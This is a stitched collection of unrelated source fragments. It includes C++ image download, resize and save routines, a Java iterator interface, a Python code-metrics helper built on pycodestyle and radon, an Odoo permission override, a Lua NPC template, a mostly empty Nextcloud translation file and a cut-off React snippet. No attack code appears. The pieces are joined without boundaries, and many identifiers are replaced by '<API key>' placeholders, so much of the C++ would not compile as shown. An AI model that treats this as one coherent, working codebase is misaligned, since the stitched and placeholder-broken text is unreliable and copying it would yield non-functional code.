		strFile1.Replace(_T("ftp:/"), _T("ftp://"));
		CImageInfo oInfo;
		// Already downloaded this URL? Reuse the cached info.
		CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.Lookup(strFile1);
		if (pPair != NULL)
			return pPair->m_value;
		// Blocking download (polls the worker thread every 10ms).
		CString strDownload = _T("");
		CFileDownloader oDownloader(strFile1, TRUE);
		oDownloader.Start( 1 );
		while ( oDownloader.IsRunned() )
		{
			::Sleep( 10 );
		}
		if ( oDownloader.IsFileDownloaded() )
			strDownload = oDownloader.GetFilePath();
		return GenerateImageID_2(strDownload, strFile1, max(1.0, width), max(1.0, height));
	}
	// Local file: verify it can be opened before registering.
	CImageInfo info;
	CFile oFile;
	if (S_OK != oFile.OpenFile(strFile))
		return info;
	oFile.CloseFile();
	// (-1, -1) means "use the image's native size" — skip the 1px clamp.
	if (-1 == width && -1 == height)
		return GenerateImageID(strFile, width, height);
	return GenerateImageID(strFile, max(1.0, width), max(1.0, height));
}
protected:
// Thin wrapper over the namespace-level _CopyFile with no progress callback.
inline void CopyFile(CString& strFileSrc, CString& strFileDst)
{
_CopyFile(strFileSrc, strFileDst, NULL, NULL);
}
#ifdef <API key>
// Allocate a solid-white BGRA media frame of the given size (optionally
// vertically flipped) and return it as IUnknown, or NULL on any failure.
// The caller owns the returned reference.
static IUnknown* CreateEmptyImage(int nWidth, int nHeight, BOOL bFlipVertical = TRUE)
{
if (nWidth < 1 || nHeight < 1)
return NULL;
MediaCore::<API key>* pMediaData = NULL;
CoCreateInstance(MediaCore::<API key>, NULL, CLSCTX_ALL, MediaCore::<API key>, (void**)(&pMediaData));
if (NULL == pMediaData)
return NULL;
if (bFlipVertical)
pMediaData->put_ColorSpace(CSP_BGRA | CSP_VFLIP);
else
pMediaData->put_ColorSpace(CSP_BGRA);
pMediaData->put_Width(nWidth);
pMediaData->put_Height(nHeight);
pMediaData->put_AspectRatioX(nWidth);
pMediaData->put_AspectRatioY(nHeight);
pMediaData->put_Interlaced(VARIANT_FALSE);
pMediaData->put_Stride(0, 4*nWidth);
pMediaData->AllocateBuffer(4*nWidth*nHeight);
BYTE* pBufferPtr = 0;
long nCreatedBufferSize = 0;
pMediaData->get_Buffer(&pBufferPtr);
pMediaData->get_BufferSize(&nCreatedBufferSize);
pMediaData->put_Plane(0, pBufferPtr);
// Bail out if the allocation did not produce the exact expected size.
if (!pBufferPtr || nCreatedBufferSize != 4*nWidth*nHeight)
{
RELEASEINTERFACE(pMediaData);
return NULL;
}
// 0xFF everywhere = opaque white in BGRA.
memset(pBufferPtr, 0xFF, nCreatedBufferSize);
IUnknown* punkInterface = NULL;
pMediaData->QueryInterface(IID_IUnknown, (void**)&punkInterface);
RELEASEINTERFACE(pMediaData);
return punkInterface;
}
// Load strFileSrc via the GDI+ image filter, downscale it to at most
// m_lMaxSizeImage on the longer side (aspect preserved), and save it into
// m_strDstMedia as image<id>.jpg or .png per the detected type. Falls back
// to a 10x10 empty frame when the file cannot be decoded.
void SaveImage(CString& strFileSrc, CImageInfo& oInfo, LONG __width, LONG __height)
{
OfficeCore::IImageGdipFilePtr pImageFile;
pImageFile.CreateInstance(OfficeCore::<API key>);
BSTR bsSrc = strFileSrc.AllocSysString();
pImageFile->OpenFile(bsSrc);
SysFreeString(bsSrc);
IUnknown* punkFrame = NULL;
pImageFile->get_Frame(&punkFrame);
if (NULL == punkFrame)
punkFrame = CreateEmptyImage(10, 10);
MediaCore::<API key>* pFrame = NULL;
punkFrame->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
RELEASEINTERFACE(punkFrame);
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
// Pick jpg/png based on frame contents (alpha etc.).
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
// Downscale proportionally when either side exceeds the cap.
LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
if ((lWidth > lMaxSize) || (lHeight > lMaxSize))
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
pImageFile->Resize(lW, lH, 3);
}
// Save type 3 = jpeg, 4 = png (per the Gdip file filter).
LONG lSaveType = 4;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = m_strDstMedia + strSaveItem + _T("jpg");
lSaveType = 3;
}
else
{
strSaveItem = m_strDstMedia + strSaveItem + _T("png");
}
BSTR bsDst = strSaveItem.AllocSysString();
pImageFile->SaveFile(bsDst, lSaveType);
SysFreeString(bsDst);
}
// Same as the file-based SaveImage, but starting from an in-memory frame:
// detect type, downscale to the cap (aspect preserved), save as
// image<id>.jpg or .png into m_strDstMedia.
void SaveImage(IUnknown* punkImage, CImageInfo& oInfo, LONG __width, LONG __height)
{
MediaCore::<API key>* pFrame = NULL;
punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
if (NULL == pFrame)
return;
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
OfficeCore::IImageGdipFilePtr pImageFile;
pImageFile.CreateInstance(OfficeCore::<API key>);
pImageFile->put_Frame(punkImage);
// Downscale proportionally when either side exceeds the cap.
LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
if ((lWidth > lMaxSize) || (lHeight > lMaxSize))
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
pImageFile->Resize(lW, lH, 3);
}
// Save type 3 = jpeg, 4 = png (per the Gdip file filter).
LONG lSaveType = 4;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = m_strDstMedia + strSaveItem + _T("jpg");
lSaveType = 3;
}
else
{
strSaveItem = m_strDstMedia + strSaveItem + _T("png");
}
BSTR bsDst = strSaveItem.AllocSysString();
pImageFile->SaveFile(bsDst, lSaveType);
SysFreeString(bsDst);
}
#else
// File-path variant (ImageStudio build): load strFileSrc through the
// ImageStudio XML transform pipeline, resize if needed, and save it as
// "\imageN.jpg" / "\imageN.png" under m_strDstMedia.  oInfo.m_eType is
// set from the loaded frame's alpha usage.
void SaveImage(CString& strFileSrc, CImageInfo& oInfo, LONG __width, LONG __height)
{
    CString strLoadXml = _T("<transforms><ImageFile-LoadImage sourcepath=\"") + strFileSrc + _T("\"/></transforms>");
    ImageStudio::IImageTransforms* pTransform = NULL;
    CoCreateInstance(ImageStudio::<API key>, NULL, <API key>, ImageStudio::<API key>, (void**)&pTransform);
    VARIANT_BOOL vbRes = VARIANT_FALSE;
    BSTR bsLoad = strLoadXml.AllocSysString();
    pTransform->SetXml(bsLoad, &vbRes);
    SysFreeString(bsLoad);
    pTransform->Transform(&vbRes);
    // Pull the loaded frame out so we can inspect its size/alpha.
    VARIANT var;
    var.punkVal = NULL;
    pTransform->GetResult(0, &var);
    if (NULL == var.punkVal)
    {
        RELEASEINTERFACE(pTransform);
        return;
    }
    MediaCore::<API key>* pFrame = NULL;
    var.punkVal->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
    RELEASEINTERFACE((var.punkVal));
    if (NULL == pFrame)
    {
        RELEASEINTERFACE(pTransform);
        return;
    }
    LONG lWidth = 0;
    LONG lHeight = 0;
    pFrame->get_Width(&lWidth);
    pFrame->get_Height(&lHeight);
    oInfo.m_eType = GetImageType(pFrame);
    RELEASEINTERFACE(pFrame);
    // Build the save step of the second transform pass.
    CString strSaveItem = _T("");
    strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
    if (itJPG == oInfo.m_eType)
    {
        strSaveItem = _T("<<API key> destinationpath=\"") + m_strDstMedia + strSaveItem + _T("jpg\" format=\"888\"/>");
    }
    else
    {
        strSaveItem = _T("<ImageFile-SaveAsPng destinationpath=\"") + m_strDstMedia + strSaveItem + _T("png\" format=\"888\"/>");
    }
    CString strXml = _T("");
    LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
    if ((lWidth <= lMaxSize) && (lHeight <= lMaxSize))
    {
        // Already small enough -- save only.
        strXml = _T("<transforms>") + strSaveItem + _T("</transforms>");
    }
    else
    {
        // Clamp the longer side to lMaxSize, preserving aspect ratio.
        LONG lW = 0;
        LONG lH = 0;
        double dAspect = (double)lWidth / lHeight;
        if (lWidth >= lHeight)
        {
            lW = lMaxSize;
            lH = (LONG)((double)lW / dAspect);
        }
        else
        {
            lH = lMaxSize;
            lW = (LONG)(dAspect * lH);
        }
        CString strResize = _T("");
        strResize.Format(_T("<<API key> type=\"65536\" width=\"%d\" height=\"%d\"/>"), lW, lH);
        strXml = _T("<transforms>") + strResize + strSaveItem + _T("</transforms>");
    }
    VARIANT_BOOL vbSuccess = VARIANT_FALSE;
    BSTR bsXml = strXml.AllocSysString();
    pTransform->SetXml(bsXml, &vbSuccess);
    SysFreeString(bsXml);
    pTransform->Transform(&vbSuccess);
    RELEASEINTERFACE(pTransform);
}
// Frame variant (ImageStudio build): feed punkImage directly into the
// transform pipeline as source 0 and save it as "\imageN.jpg" /
// "\imageN.png" under m_strDstMedia.  Unlike the file-path variant,
// the resize clamp here is computed from the caller-supplied
// __width/__height rather than from the frame's own dimensions.
void SaveImage(IUnknown* punkImage, CImageInfo& oInfo, LONG __width, LONG __height)
{
    MediaCore::<API key>* pFrame = NULL;
    punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
    if (NULL == pFrame)
        return;
    LONG lWidth = 0;
    LONG lHeight = 0;
    pFrame->get_Width(&lWidth);
    pFrame->get_Height(&lHeight);
    oInfo.m_eType = GetImageType(pFrame);
    RELEASEINTERFACE(pFrame);
    ImageStudio::IImageTransforms* pTransform = NULL;
    CoCreateInstance(ImageStudio::<API key>, NULL ,<API key>, ImageStudio::<API key>, (void**)&pTransform);
    // Hand the frame to the pipeline as source slot 0.
    VARIANT var;
    var.vt = VT_UNKNOWN;
    var.punkVal = punkImage;
    pTransform->SetSource(0, var);
    CString strSaveItem = _T("");
    strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
    if (itJPG == oInfo.m_eType)
    {
        strSaveItem = _T("<<API key> destinationpath=\"") + m_strDstMedia + strSaveItem + _T("jpg\" format=\"888\"/>");
    }
    else
    {
        strSaveItem = _T("<ImageFile-SaveAsPng destinationpath=\"") + m_strDstMedia + strSaveItem + _T("png\" format=\"888\"/>");
    }
    LONG lMaxSize = min(max(__width, __height), m_lMaxSizeImage);
    CString strXml = _T("");
    if ((lWidth <= lMaxSize) && (lHeight <= lMaxSize))
    {
        // Already small enough -- save only.
        strXml = _T("<transforms>") + strSaveItem + _T("</transforms>");
    }
    else
    {
        // Clamp the longer side to lMaxSize, preserving aspect ratio.
        LONG lW = 0;
        LONG lH = 0;
        double dAspect = (double)lWidth / lHeight;
        if (lWidth >= lHeight)
        {
            lW = lMaxSize;
            lH = (LONG)((double)lW / dAspect);
        }
        else
        {
            lH = lMaxSize;
            lW = (LONG)(dAspect * lH);
        }
        CString strResize = _T("");
        strResize.Format(_T("<<API key> type=\"65536\" width=\"%d\" height=\"%d\"/>"), lW, lH);
        strXml = _T("<transforms>") + strResize + strSaveItem + _T("</transforms>");
    }
    VARIANT_BOOL vbSuccess = VARIANT_FALSE;
    BSTR bsXml = strXml.AllocSysString();
    pTransform->SetXml(bsXml, &vbSuccess);
    SysFreeString(bsXml);
    pTransform->Transform(&vbSuccess);
    RELEASEINTERFACE(pTransform);
}
#endif
// Assign (or reuse) an image ID for an in-memory frame.  Frames are
// deduplicated by a CRC of their raw pixel buffer: a cache hit returns
// the previously stored CImageInfo; a miss allocates the next ID,
// saves the image to disk and records it in the cache and image list.
// dWidth/dHeight are in millimetres and converted to pixels at 96 DPI.
CImageInfo GenerateImageID(IUnknown* punkData, double dWidth, double dHeight)
{
    CImageInfo oInfo;
    if (NULL == punkData)
        return oInfo;
    LONG lWidth = (LONG)(dWidth * 96 / 25.4);
    LONG lHeight = (LONG)(dHeight * 96 / 25.4);
    MediaCore::<API key>* pFrame = NULL;
    punkData->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
    // BUGFIX: guard against QueryInterface failure; the original
    // dereferenced pFrame unconditionally (every other method in this
    // class performs this check).
    if (NULL == pFrame)
        return oInfo;
    BYTE* pBuffer = NULL;
    LONG lLen = 0;
    pFrame->get_Buffer(&pBuffer);
    pFrame->get_BufferSize(&lLen);
    // Deduplicate by checksum of the raw pixels.
    DWORD dwSum = m_oCRC.Calc(pBuffer, lLen);
    CAtlMap<DWORD, CImageInfo>::CPair* pPair = m_mapImageData.Lookup(dwSum);
    if (NULL == pPair)
    {
        ++m_lNextIDImage;
        oInfo.m_lID = m_lNextIDImage;
        SaveImage(punkData, oInfo, lWidth, lHeight);
        m_mapImageData.SetAt(dwSum, oInfo);
        m_listImages.AddTail(oInfo);
    }
    else
    {
        oInfo = pPair->m_value;
    }
    RELEASEINTERFACE(pFrame);
    return oInfo;
}
// Assign (or reuse) an image ID for an image file, deduplicated by file
// name.  In metafile-enabled builds, WMF/EMF inputs are converted to SVG
// (with the original copied alongside); on conversion failure we fall
// back to the raster path.  dWidth/dHeight are millimetres (96 DPI).
CImageInfo GenerateImageID(CString& strFileName, double dWidth, double dHeight)
{
    CImageInfo oInfo;
    CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.Lookup(strFileName);
    LONG lWidth = (LONG)(dWidth * 96 / 25.4);
    LONG lHeight = (LONG)(dHeight * 96 / 25.4);
    if (NULL == pPair)
    {
#ifdef <API key>
        // 1 == WMF, 2 == EMF; anything else falls through to raster.
        LONG lImageType = m_oExt.GetImageType(strFileName);
        if (1 == lImageType || 2 == lImageType)
        {
            ++m_lNextIDImage;
            oInfo.m_lID = m_lNextIDImage;
            oInfo.m_eType = (1 == lImageType) ? itWMF : itEMF;
            CString strSaveItem = _T("");
            strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
            strSaveItem = m_strDstMedia + strSaveItem;
            // 100x scale in pixels-per-mm for the SVG rasterization bounds.
            double dKoef = 100 * 96 / 25.4;
            bool bIsSuccess = m_oExt.Convert(strFileName, LONG(dWidth * dKoef), LONG(dHeight * dKoef), strSaveItem + _T("svg"));
            if (bIsSuccess)
            {
                // Keep the original metafile next to the SVG.
                if (itWMF == lImageType)
                {
                    CDirectory::CopyFile(strFileName, strSaveItem + _T("wmf"), NULL, NULL);
                }
                else
                {
                    CDirectory::CopyFile(strFileName, strSaveItem + _T("emf"), NULL, NULL);
                }
                m_mapImagesFile.SetAt(strFileName, oInfo);
                m_listImages.AddTail(oInfo);
                return oInfo;
            }
            else
            {
                // Roll back the reserved ID and fall through to raster save.
                --m_lNextIDImage;
                oInfo.m_eType = itJPG;
            }
        }
#endif
        ++m_lNextIDImage;
        oInfo.m_lID = m_lNextIDImage;
        SaveImage(strFileName, oInfo, lWidth, lHeight);
        m_mapImagesFile.SetAt(strFileName, oInfo);
        m_listImages.AddTail(oInfo);
    }
    else
    {
        // Same source file already registered: reuse its info.
        oInfo = pPair->m_value;
    }
    return oInfo;
}
// Variant of GenerateImageID that registers the result under strUrl
// (the original remote address) instead of the local temp file name.
// NOTE(review): unlike GenerateImageID, no Lookup is performed first,
// so repeated calls for the same URL re-save under new IDs -- confirm
// callers deduplicate before calling.
CImageInfo GenerateImageID_2(CString& strFileName, CString& strUrl, double dWidth, double dHeight)
{
    CImageInfo oInfo;
    LONG lWidth = (LONG)(dWidth * 96 / 25.4);
    LONG lHeight = (LONG)(dHeight * 96 / 25.4);
#ifdef <API key>
    // 1 == WMF, 2 == EMF; convert metafiles to SVG when possible.
    LONG lImageType = m_oExt.GetImageType(strFileName);
    if (1 == lImageType || 2 == lImageType)
    {
        ++m_lNextIDImage;
        oInfo.m_lID = m_lNextIDImage;
        oInfo.m_eType = (1 == lImageType) ? itWMF : itEMF;
        CString strSaveItem = _T("");
        strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
        strSaveItem = m_strDstMedia + strSaveItem;
        double dKoef = 100 * 96 / 25.4;
        bool bIsSuccess = m_oExt.Convert(strFileName, LONG(dWidth * dKoef), LONG(dHeight * dKoef), strSaveItem + _T("svg"));
        if (bIsSuccess)
        {
            // Keep the original metafile next to the SVG.
            if (itWMF == lImageType)
            {
                CDirectory::CopyFile(strFileName, strSaveItem + _T("wmf"), NULL, NULL);
            }
            else
            {
                CDirectory::CopyFile(strFileName, strSaveItem + _T("emf"), NULL, NULL);
            }
            m_mapImagesFile.SetAt(strFileName, oInfo);
            m_listImages.AddTail(oInfo);
            return oInfo;
        }
        else
        {
            // Roll back the reserved ID and fall through to raster save.
            --m_lNextIDImage;
            oInfo.m_eType = itJPG;
        }
    }
#endif
    ++m_lNextIDImage;
    oInfo.m_lID = m_lNextIDImage;
    SaveImage(strFileName, oInfo, lWidth, lHeight);
    // Registered under the URL, not the local file name (cf. above).
    m_mapImagesFile.SetAt(strUrl, oInfo);
    m_listImages.AddTail(oInfo);
    return oInfo;
}
// Pick the output format for a frame: JPG when the destination format
// forces it (m_lDstFormat == 2) or when every pixel is fully opaque;
// PNG as soon as any alpha byte differs from 255.
ImageType GetImageType(MediaCore::<API key>* pFrame)
{
    if (2 == m_lDstFormat)
        return itJPG;
    LONG lWidth = 0;
    LONG lHeight = 0;
    BYTE* pBuffer = NULL;
    pFrame->get_Width(&lWidth);
    pFrame->get_Height(&lHeight);
    pFrame->get_Buffer(&pBuffer);
    // Assumes a tightly packed 4-byte-per-pixel buffer with alpha at
    // byte offset 3 (BGRA) -- consistent with FlipX/FlipY below.
    BYTE* pBufferMem = pBuffer + 3;
    LONG lCountPix = lWidth * lHeight;
    for (LONG i = 0; i < lCountPix; ++i, pBufferMem += 4)
    {
        if (255 != *pBufferMem)
            return itPNG;
    }
    return itJPG;
}
// Mirror a frame vertically in place by swapping whole rows through a
// temporary row buffer.  Only tightly packed 32bpp frames (stride ==
// width * 4) are handled; anything else is left untouched.
void FlipY(IUnknown* punkImage)
{
    if (NULL == punkImage)
        return;
    MediaCore::<API key>* pFrame = NULL;
    punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
    if (NULL == pFrame)
        return;
    BYTE* pBuffer = NULL;
    LONG lWidth = 0;
    LONG lHeight = 0;
    LONG lStride = 0;
    pFrame->get_Buffer(&pBuffer);
    pFrame->get_Width(&lWidth);
    pFrame->get_Height(&lHeight);
    pFrame->get_Stride(0, &lStride);
    // A negative stride marks a bottom-up layout; work with magnitude.
    if (lStride < 0)
        lStride = -lStride;
    if ((lWidth * 4) != lStride)
    {
        RELEASEINTERFACE(pFrame);
        return;
    }
    // Swap row i with row (height-1-i), walking inward from both ends.
    BYTE* pBufferMem = new BYTE[lStride];
    BYTE* pBufferEnd = pBuffer + lStride * (lHeight - 1);
    LONG lCountV = lHeight / 2;
    for (LONG lIndexV = 0; lIndexV < lCountV; ++lIndexV)
    {
        memcpy(pBufferMem, pBuffer, lStride);
        memcpy(pBuffer, pBufferEnd, lStride);
        memcpy(pBufferEnd, pBufferMem, lStride);
        pBuffer += lStride;
        pBufferEnd -= lStride;
    }
    RELEASEARRAYOBJECTS(pBufferMem);
    RELEASEINTERFACE(pFrame);
}
// Mirror a frame horizontally in place, swapping 32-bit pixels from the
// two ends of each row.  Only tightly packed 32bpp frames (stride ==
// width * 4) are handled; anything else is left untouched.
void FlipX(IUnknown* punkImage)
{
    if (NULL == punkImage)
        return;
    MediaCore::<API key>* pFrame = NULL;
    punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
    if (NULL == pFrame)
        return;
    BYTE* pBuffer = NULL;
    LONG lWidth = 0;
    LONG lHeight = 0;
    LONG lStride = 0;
    pFrame->get_Buffer(&pBuffer);
    pFrame->get_Width(&lWidth);
    pFrame->get_Height(&lHeight);
    pFrame->get_Stride(0, &lStride);
    // A negative stride marks a bottom-up layout; work with magnitude.
    if (lStride < 0)
        lStride = -lStride;
    if ((lWidth * 4) != lStride)
    {
        RELEASEINTERFACE(pFrame);
        return;
    }
    DWORD* pBufferDWORD = (DWORD*)pBuffer;
    LONG lW2 = lWidth / 2;
    for (LONG lIndexV = 0; lIndexV < lHeight; ++lIndexV)
    {
        DWORD* pMem1 = pBufferDWORD;
        DWORD* pMem2 = pBufferDWORD + lWidth - 1;
        // BUGFIX: the original `while (lI < lW2)` never incremented lI
        // (infinite loop for lWidth >= 2) and pBufferDWORD was never
        // advanced, so only row 0 was ever touched.
        for (LONG lI = 0; lI < lW2; ++lI)
        {
            DWORD dwMem = *pMem1;
            *pMem1++ = *pMem2;
            *pMem2-- = dwMem;
        }
        // Step to the next row (stride is exactly lWidth DWORDs here).
        pBufferDWORD += lWidth;
    }
    RELEASEINTERFACE(pFrame);
}
};
} |
package com.rapidminer.example;
import java.util.Iterator;
/**
 * An ExampleReader iterates over a sequence of examples. Note that although this interface
 * extends Iterator&lt;Example&gt;, the method remove() is usually not supported. Invoking remove() will
 * lead to an {@link java.lang.<API key>} in most cases.
 *
 * @author Simon Fischer, Ingo Mierswa
 */
public interface ExampleReader extends Iterator<Example> {
}
#!/usr/bin/env python
# Aid tools to quality checker.
# Qchecklib
# Eliane Araujo, 2016
import os
import sys
import commands
import json
try:
from cc import measure_complexity
except ImportError:
print("tst quality checker needs cc.py to work.")
sys.exit(1)
try:
sys.path.append('/usr/local/bin/radon/')
from radon.raw import *
from radon.complexity import *
from radon.metrics import *
except ImportError:
print("tst quality checker needs radon to work.")
sys.exit(1)
try:
import urllib.request as urlrequest
except ImportError:
import urllib as urlrequest
# Base endpoint of the qcheck logging service; the action name ("accept")
# is appended by save().
url = 'http://qchecklog.appspot.com/api/action/'
def four_metrics(program_name):
    """Return "<lloc> <cc> <halstead-volume> <pep8-count>" for a program.

    BUGFIX: pep8() returns a list whose first element is the error count
    (it is [0] for a clean program); the original indexed it with the
    string "count", which raises TypeError on every call.  pep8count()
    already uses [0].
    """
    return "%s %s %s %s" % (
        lloc(program_name),
        cc(program_name),
        vhalstead(program_name),
        pep8(program_name)[0],
    )
def pep8count(program):
    """Return only the number of PEP8 (pycodestyle) errors in *program*."""
    count = pep8(program)[0]
    return int(count)
def pep8(program):
    # Run pycodestyle on *program* (errors only, with a trailing count)
    # and return a list: [error_count, message1, message2, ...].
    # A clean program yields [0].
    result = []
    cmd = 'pycodestyle.py --select=E --count ' + program
    try:
        pep_errors = commands.getoutput(cmd)
    except ImportError:
        # NOTE(review): commands.getoutput() does not raise ImportError,
        # so this guard probably never fires -- confirm the intended
        # failure mode (missing pycodestyle yields shell error text).
        print("tst quality checker needs pycodestyle.py to work.")
        sys.exit(1)
    if pep_errors:
        for error in pep_errors.splitlines():
            if error.isdigit():
                # The bare number emitted by --count: record it as the
                # first element and stop scanning.
                result.insert(0, int(error))
                break
            # remove filename from message.
            # Example:
            # reference.py:15:16: E225 missing whitespace around operator
            result.append(error[error.find(":") + 1:])
    else:
        result = [0]
    return result
def header_lines(filename):
    """Count the leading comment lines of *filename*.

    Lines starting with "#" -- including the shebang/env line and any
    coding declaration -- count as header lines; counting stops at the
    first non-"#" line.

    BUGFIX: the startswith() argument was truncated in the source;
    restored to "#".  Also guards against a file that is all header,
    which previously walked past the end of the line list.
    """
    with open(filename, 'r') as program:
        code = program.read()
    counter = 0
    codelines = code.split("\n")
    while counter < len(codelines) and codelines[counter].startswith("#"):
        counter += 1
    return counter
def vhalstead(filename):
    """Shortcut: the Halstead volume metric of *filename*."""
    volume = halstead_metrics("vol", filename)
    return volume
def halstead_metrics(options, filename):
    """Compute a Halstead metric for *filename* via radon's h_visit.

    options -- 'vol' selects the Halstead volume; any other value keeps
    the full h_visit report (note round() then requires it to be
    numeric, as in the original).

    Uses a context manager so the file handle is closed even when
    h_visit raises (the original leaked it on error).
    """
    with open(filename, 'r') as program:
        code = program.read()
    if options == 'vol':
        h = h_visit(code).volume
    else:
        h = h_visit(code)
    return round(h, 2)
def cc(filename):
    """Return the total cyclomatic complexity of *filename*.

    Radon's cc_visit only reports functions and classes; for flat
    scripts with neither, fall back to cc.py's measure_complexity on
    the whole module.  Returns 0 (after printing a notice) when both
    analyses fail.

    Uses a context manager so the file handle is closed even on error
    (the original left it open until the explicit close), and drops the
    unused exception variable.
    """
    with open(filename, 'r') as program:
        code = program.read()
    try:
        # Use radon
        visitor = cc_visit(code)
        if len(visitor) <= 0:
            # Doesn't have functions or classes: use cc.py instead.
            stats = measure_complexity(code)
            total = stats.complexity
        else:
            # Sum the complexity of every reported block.
            total = 0
            for block in visitor:
                total += block.complexity
    except Exception:
        # Failed -- report and degrade to 0 rather than crash.
        print("qcheck: unable to get cc")
        total = 0
    return total
def lloc(filename):
    """Return the logical lines of code of *filename*.

    Index 1 of radon's raw-metrics tuple is the LLOC field.  Uses a
    context manager so the handle is closed even if analysis raises.
    """
    with open(filename, 'r') as program:
        code = program.read()
    return raw_metrics(code)[1]
def raw_metrics(code):
    """Thin wrapper over radon's analyze(): raw metrics for *code*."""
    report = analyze(code)
    return report
def save(message):
    # POST *message* to the qcheck logging service's "accept" action.
    # NOTE(review): under Python 3 urlopen requires bytes for `data`;
    # this module targets Python 2 (see the `commands` import) -- confirm
    # before porting.
    type_ = 'accept'
    urlrequest.urlopen(url + type_, data=message)
# Run directly, this module only identifies itself; it is meant to be
# imported by the tst_qcheck commands.
if __name__ == '__main__':
    print("qchecklib is a helper module for tst_qcheck commands")
# -*- coding: utf-8 -*-
from openerp import api, _, models
from openerp.exceptions import UserError
class MrpBomLine(models.Model):
    """Restrict create/write/unlink on BoM lines to the LDM manager group.

    Each CRUD entry point re-checks group membership and raises UserError
    for non-members before delegating to the standard implementation.
    """
    _inherit = 'mrp.bom.line'

    @api.model
    def create(self, vals):
        # Only LDM managers may add material lines.
        if not self.env.user.has_group(
                '<API key>.group_manager_ldm'):
            raise UserError(_('Error!\nYou do not have privileges to Create'
                              ' Material(s) list.\nCheck with your'
                              ' System Administrator.'))
        return super(MrpBomLine, self).create(vals)

    @api.one
    def write(self, vals):
        # Only LDM managers may modify material lines.
        if not self.env.user.has_group(
                '<API key>.group_manager_ldm'):
            raise UserError(_('Error!\nYou do not have privileges to Modify'
                              ' Material(s) list.\nCheck with your'
                              ' System Administrator.'))
        return super(MrpBomLine, self).write(vals)

    @api.multi
    def unlink(self):
        # Only LDM managers may delete material lines.
        if not self.env.user.has_group(
                '<API key>.group_manager_ldm'):
            raise UserError(_('Error!\nYou do not have privileges to Delete'
                              ' Material(s) list.\nCheck with your'
                              ' System Administrator.'))
        return super(MrpBomLine, self).unlink()
-- Creature template for the named NPC "Hagrin Zeed": a level-100
-- townsperson with no harvestables, no loot, no attacks and no taming.
hagrin_zeed = Creature:new {
	objectName = "",
	customName = "Hagrin Zeed",
	socialGroup = "townsperson",
	faction = "townsperson",
	level = 100,
	chanceHit = 1,
	damageMin = 645,
	damageMax = 1000,
	baseXp = 9429,
	baseHAM = 24000,
	baseHAMmax = 30000,
	armor = 0,
	-- Standard nine-slot resist table; -1 in the last slot.
	resists = {0,0,0,0,0,0,0,0,-1},
	meatType = "",
	meatAmount = 0,
	hideType = "",
	hideAmount = 0,
	boneType = "",
	boneAmount = 0,
	milk = 0,
	tamingChance = 0,
	ferocity = 0,
	pvpBitmask = NONE,
	creatureBitmask = PACK,
	optionsBitmask = 136,
	diet = HERBIVORE,
	templates = {"object/mobile/dressed_hagrin_zeed.iff"},
	lootGroups = {},
	weapons = {},
	<API key> = "<API key>",
	attacks = {
	}
}

-- Register the template under its spawn key.
CreatureTemplates:addCreatureTemplate(hagrin_zeed, "hagrin_zeed")
// Nextcloud L10N registration for the "quicknotes" app.
// NOTE(review): every translation value is empty except the two {user}
// entries -- this looks like an untranslated/placeholder locale; confirm
// whether the file is generated from the translation server.
OC.L10N.register(
    "quicknotes",
    {
    "Quick notes" : "",
    "Tag the note" : "",
    "Enter tags to organize your note" : "",
    "Enter tag name" : "",
    "Cancel" : "",
    "Done" : "",
    "Tags" : "",
    "Save" : "",
    "Looking for your notes" : "",
    "Nothing here. Take your first quick notes" : "",
    "Are you sure you want to delete the note?" : "",
    "Delete note" : "",
    "Unpin note" : "",
    "Pin note" : "",
    "Do you want to discard the changes?" : "",
    "Unsaved changes" : "",
    "Select file to attach" : "",
    "New note" : "",
    "All notes" : "",
    "Colors" : "",
    "Notes" : "",
    "Bold" : "",
    "Italic" : "",
    "Underline" : "",
    "Strikethrough" : "",
    "Bulleted list" : "",
    "Numbered list" : "",
    "Blockquote" : "",
    "Clean format" : "",
    "Quick notes with a basic rich text" : "",
    "No tags found" : "",
    "Share note" : "",
    "Select the users to share. By default you only share the note. Attachments should be shared from files so they can view it." : "",
    "Select the users to share" : "",
    "No user found" : "",
    "Shared with {user}" : " {user} ",
    "Shared by {user}" : " {user} ",
    "Delete attachment" : "",
    "Attach file" : "",
    "Shared" : "",
    "Shared with others" : "",
    "Shared with you" : "",
    "Close" : "",
    "Default color for new notes" : "",
    "Settings" : ""
},
"nplurals=1; plural=0;");
'use strict'
import { connect } from 'react-redux'
import TagList from '../../components/tagList/tagList'
var $ = require('jquery')
// Internal bookkeeping keys that must never surface as visible tags.
const ignoredTags = ['geometry', '_clicked', '_hovered']

/**
 * Map the currently selected feature's properties onto the TagList
